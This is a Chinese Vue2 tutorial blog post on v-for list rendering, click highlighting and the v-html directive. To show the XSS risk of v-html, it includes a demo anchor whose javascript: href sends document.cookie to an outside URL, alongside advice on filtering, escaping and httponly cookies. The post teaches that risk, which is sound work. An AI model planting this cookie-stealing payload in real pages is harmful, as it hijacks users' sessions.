Vue 响应式渲染 - 列表布局和v-html

JSON_L2025-01-29 17:10

Vue 渐进式JavaScript 框架 基于Vue2的学习笔记 - Vue 响应式渲染 - 列表布局和v-html

目录

列表布局

简单渲染列表

显示索引值

点击变色

V-html

作用

注意

采用策略

应用

总结

列表布局

简单渲染列表

Data中设置状态,是一个数组格式的默认信息。

然后设置v-for循环渲染ul的li元素。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <ul>
        <li v-for="item in datalist">{
  
  {item}}</li>
    </ul>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            datalist:["zhangsan", "lisi", "wangwu", "xiaoming"]
        },
        methods: {}
    })
</script>
</body>
</html>

效果如下:

显示索引值

显示列表数据的索引值。

示例如下:

html 复制代码 
<ul>
    <li v-for="(item, index) in datalist">
        {
  
  {item}}--{
  
  {index}}
    </li>
</ul>

效果如下:

点击变色

创建一个列表,点击哪一个行,哪一行显示选中效果。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <style>
        .active {
            background: red;
        }
    </style>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <ul>
        <li v-for="(item, index) in datalist" :class="current === index ? 'active': ''"
            @click="handleClick(index)">
            {
  
  {item}}
        </li>
    </ul>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            current: 0,
            datalist: ['面朝大海,春暖花开', '从明天起,做一个幸福的人', '喂马、劈柴,周游世界'],
        },
        methods: {
            handleClick(index) {
                this.current = index
            }
        }
    })
</script>
</body>
</html>

实现效果:

V-html

作用

更新元素的innerHTML。

注意

内容按普通 HTML插入。不会作为 Vue 模板进行编译。如果试图使用 v-html 组合模板,可以重新考虑是否通过使用组件来替代。

在网站上动态渲染任意 HTML 是非常危险的,因为容易导致 xss 攻击。

在可信内容上,不用在用户提交的内容上。

采用策略

使用V-html 需防止XSS,CSRF

前端过滤

后台转义

给cookie加上属性httponly

应用

模拟ajax请求后端数据后,使用vue解析和v-html解析展示不同效果。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <div>{
  
  {mydanger}}</div>
    <div v-html="mydanger"></div>
    <button @click="handleAjax()">请求</button>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            mydanger: '',
        },
        methods: {
            handleAjax() {
                console.log('点击了按钮')
                // 此处为请求后端获取数据
                this.mydanger = "<a href=javascript:location.href='http://www.baidu.com?cookie='+document.cookie>震惊!!!点击查看</a>"
            }
        }
    })
</script>
</body>
</html>

效果如下:

点击链接后,会跳转链接并带着cookie,非常危险。

总结

Vue 渐进式JavaScript 框架 基于Vue2的学习笔记 - Vue 响应式渲染 - 列表布局和v-html

相关推荐
吴声子夜歌21 分钟前
TypeScript——泛型
前端·git·typescript
猩猩程序员1 小时前
Pretext:一个绕过 DOM 的纯 JavaScript 排版引擎
前端
竹林8181 小时前
从“连接失败”到丝滑登录:我用 ethers.js 连接 MetaMask 的完整踩坑实录
前端·javascript
神舟之光1 小时前
jwt权限控制简单总结(乡村意见簿-vue-express-mongdb)
前端·vue.js·express
铭毅天下1 小时前
EasySearch Rules 规则语法速查手册
开发语言·前端·javascript·ecmascript
bjzhang752 小时前
使用 HTML + JavaScript 实现 SQL 智能补全功能
javascript·html·sql智能补全
GISer_Jing2 小时前
AI Agent操作系统架构师:Harness Engineer解析
前端·人工智能·ai·aigc
英俊潇洒美少年2 小时前
css中专门用来提升渲染性能、减少重排重绘的属性
前端·css
天若有情6732 小时前
前端HTML精讲01:别再乱 div 一把抓,吃透语义化标签才是进阶第一步
前端·html
Highcharts.js2 小时前
React 开发者的图表库生态:Highcharts React
前端·react.js·前端框架
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)07“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)08UV安装并设置国内源09中国象棋-html版本10OpenClaw 使用和管理 MCP 完全指南